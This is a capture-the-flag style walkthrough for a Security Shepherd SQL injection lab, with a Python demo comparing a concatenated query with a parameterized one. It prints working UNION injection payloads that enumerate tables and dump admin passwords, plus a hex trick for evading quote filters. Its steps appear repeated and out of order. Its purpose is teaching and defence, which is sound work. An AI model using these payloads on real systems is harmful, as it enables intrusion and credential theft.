SQL Injection Challenge 5: Security Shepherd

With visible injection points (e.g., column positions 2 and 3), we query the information_schema database—the MySQL system catalog.

Payload to list tables:

1 AND 1=2 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() -- -

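Note: In Security Shepherd, you often need to URL-encode spaces and special characters. The trailing -- - (hyphen, hyphen, space, hyphen) comments out the rest of the original query; MySQL only treats -- as a comment when it is followed by whitespace, and the extra hyphen keeps that space from being trimmed.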

What you’re looking for: A table named users, administrators, or shepherd_users.

Now, combine everything.

Payload:

1 AND 1=2 UNION SELECT 1,admin_user,admin_pass FROM administrators -- -

If the challenge uses a single quote filter, you may need to use hex encoding: FROM administrators WHERE admin_user=0x61646d696e (hex for 'admin').

The twist in Challenge 5: It often stores passwords as unsalted MD5 or SHA1. The flag is not the hash itself, but the plaintext value you must crack or a secondary token hidden in another column.

We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), this data is in information_schema.tables.

Payload:

' UNION SELECT 1, table_name, 3 FROM information_schema.tables-- 

Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.

This injection will list table names. You look for a table named something like users or app_users.

Now we have all the pieces: Table (users) and Column (password). We modify our injection to dump the password for the Admin user.

Payload:

' UNION SELECT 1, password, 3 FROM users WHERE username='Admin'-- 

The application will execute the query. Instead of showing the search results for the original query, it will inject the result of our second query. The password (or flag) for the Admin user will appear in the spot where the username or other data is usually displayed on the webpage.
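
Added example (not part of the original walkthrough and not Security Shepherd's own code): the final payload above run against a string-concatenated query and against the same query with a bound parameter, to show why the first leaks the row and the second does not. It uses Python's sqlite3 in place of MySQL so it runs offline; the items table, the function names and all sample rows are constructed for illustration.

```python
import sqlite3

# Constructed sample data. users/username/password follow the walkthrough's
# final payload; the items table and its rows are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (id INTEGER, name TEXT, price INTEGER);
        INSERT INTO items VALUES (1, 'coupon', 5), (2, 'voucher', 10);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('Admin', 'constructed-secret');
    """)
    return db

def search_vulnerable(db, term):
    # The input is concatenated into the SQL text, so a quote in `term`
    # closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT id, name, price FROM items WHERE name = '" + term + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The placeholder binds `term` as a value; it is compared to name
    # as one literal string and never reaches the SQL parser.
    return db.execute(
        "SELECT id, name, price FROM items WHERE name = ?", (term,)
    ).fetchall()

# The last payload from the walkthrough, unchanged (note the trailing space).
PAYLOAD = "' UNION SELECT 1, password, 3 FROM users WHERE username='Admin'-- "

if __name__ == "__main__":
    db = make_db()
    print("concatenated: ", search_vulnerable(db, PAYLOAD))
    print("parameterized:", search_parameterized(db, PAYLOAD))
    print("normal search:", search_parameterized(db, "coupon"))
```
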